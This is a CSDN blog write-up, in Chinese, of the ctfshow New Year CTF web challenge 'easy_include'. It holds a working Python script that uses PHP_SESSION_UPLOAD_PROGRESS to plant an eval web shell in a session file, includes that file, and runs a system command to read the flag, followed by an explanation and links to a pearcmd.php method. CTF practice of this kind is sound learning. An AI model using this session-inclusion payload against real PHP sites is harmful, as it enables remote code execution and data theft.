ctfshow元旦,easy_include

最新推荐文章于 2024-05-29 17:38:19 发布
最新推荐文章于 2024-05-29 17:38:19 发布
阅读量1.4k 收藏 12
点赞数 6
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62306641/article/details/135431426
版权

比赛的时候没做出来,试了伪协议没想到文件包含。

赛后看完wp才明白。

目前,有两种方法,一个是session文件包含。

使用session文件包含:

import requests

url="http://6c53073e-b08b-4a3a-894b-20bf943d8d5f.challenge.ctf.show/"

data = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',
    '1': 'localhost/tmp/sess_ctfshow',
    '2': 'system("cat /f*");'
    }

file = {
    'file': 'ctfshow'
}
cookies = {
    'PHPSESSID': 'ctfshow'
}

response = requests.post(url=url,data=data,files=file,cookies=cookies)
print(response.text)

参看这几位师傅

session文件包含漏洞详解-CSDN博客

CTFshow元旦水友赛官方WP (qq.com)

PHP_SESSION_UPLOAD_PROGRESS,是写入临时文件的内容。
localhost/tmp/sess_ctfshow,是要包含的文件路径。
'PHPSESSID': 'ctfshow',Php会创建一个sess_ctfshow的临时文件,内容就是PHP_SESSION_UPLOAD_PROGRESS。
file://协议包含,localhost/tmp/sess_ctfshow。

设置PHP_SESSION_UPLOAD_PROGRESS,Php会创建一个临时文件在默认目录下面,localhost/tmp/,PHP_SESSION_UPLOAD_PROGRESS将他的值写入到临时文件中。

我们包含它就可以了。

方法2:pearcmd.php文件包含妙用

写贴几个链接:

pearcmd.php文件包含妙用_pearcmd文件包含-CSDN博客

Docker PHP裸文件本地包含综述 | 离别歌 (leavesongs.com)

[ctfshow 2023元旦水友赛]web题解-CSDN博客

P神讲的很清楚。这里就不过多赘述了。

藤井树441
关注
【Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp
2401_84281629的博客
04-27 890
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
初中语文文摘文苑那年元旦__惊天地泣鬼神
09-09
这篇内容并非关于IT行业的知识点,而是描述了一个初中班级在元旦联欢会上的有趣场景,主要体现了学生与老师的互动以及集体合作的精神。不过,我们可以从中提取出一些通用的、与学习和团队活动相关的重要概念,这些...
【CTFshow】元旦水友赛easy_include
qq_48932191的博客
01-20 1393
'1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径,session文件默认命名方式是sess_'PHP_SESSION_UPLOAD_PROGRESS': '
CTFshow元旦水友赛-web-easy include
jwkaaaaaa的博客
05-22 561
CTF元旦水友赛-web-easy include wp
ctfshow文件包含
Vincent0sen的博客
11-13 1279
解法一 - php://input解法二 - data://
ctfshow 文件包含
m0_74097148的博客
03-25 250
【代码】ctfshow 文件包含。
【Web】CTFSHOW元旦水友赛部分wp
uuzeray的博客
01-02 4155
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
[CMS程序]搜客CMS网站内容管理系统 v1.3 2006元旦版_scms.zip
03-19
【CMS程序】搜客CMS网站内容管理系统 v1.3 2006元旦版_scms.zip CMS(Content Management System,内容管理系统)是用于构建、管理和维护网站的强大工具,它为非技术人员提供了一种便捷的方式来更新网站内容。搜客...
三年级数学上册七庆元旦__时分秒的认识单元综合检测题pdf无答案青岛版
09-09
三年级数学上册七庆元旦__时分秒的认识单元综合检测题pdf无答案青岛版
ctfshow元旦水友赛wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解题思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在...
【pwn】ctfshow元旦水友赛--BadBoy
question55的博客
02-06 1688
首先先来看一下程序的保护情况这里got表可改,没有开地址随机接着看一下ida逻辑很直接,只有一个main函数,一点点分析这段代码buf[1] = __readfsqword(0x28u); init_func(argc, argv, envp); buf[0] = 'gfedcba'; v5 = 0LL; while ( (_DWORD)kl ) { puts("i am bad boy "); __isoc99_scanf("%ld", &v4); write(
2024ctfshow元旦水友赛 RE re_signin
Pisces50002的博客
01-07 703
41行 获取128个字符,v8算个长度,读入到回车就停止。对每一个字符,加上一个v7,再异或v7>>4,很简单的签到题,然而我把加密函数看花眼了。v6是用来记录上次的result。47行 比对密文,s2已经给出。主要函数部分可以直接看到。45行 生成了一个key。进encrypt看一下。
ctfshow元旦水友赛 easy_web(进一步解释)
最新发布
2301_80240388的博客
05-29 1114
刷题时看到有大佬已经有wp了,但其中有些东西并不能让我很好的理解,特写一篇文章来补全一下大佬wp#预期解法。
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 514
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
[ctfshow 2023元旦水友赛]web题解
rev1ve的博客
01-05 3110
按照waf_in_waf_php对name的值进行waf以及waf_in_waf_php中的hint是base64,并且结合。简单点讲,就是我们先对我们的chu0的值进行加密也就是标记,然后拼接在一起后进行过滤器解析,利用最后的base64-decode无法解析前面ctfshowshowshowwww的垃圾字符被去除掉,而我们的chu0的值则会被正确解析并保留。有一个特性,当GET和POST有相同的变量时,匹配POST的变量,那么就可以同时传参GET和POST即可绕过,也就是POST传参数字。
CTFshow元旦水友赛web部分题解
qq_34942239的博客
01-27 1970
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
ctfshow 元旦水友赛 月月的爱情故事(复现)
Altering_Ji的博客
01-03 1755
ctfshow元旦水友赛密码学第一题月月的爱情故事,摩斯密码和AES
ctfshow元旦水友赛 misc 以假换真wp
Altering_Ji的博客
01-15 3469
ctfshow元旦水友赛misc第一题 以假换真wp 明文攻击 秒传原理md5碰撞
ctfshow2024元旦杯web
NYG694的博客
01-04 2135
2024ctfshow水友元旦杯web方向题解---更新中
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值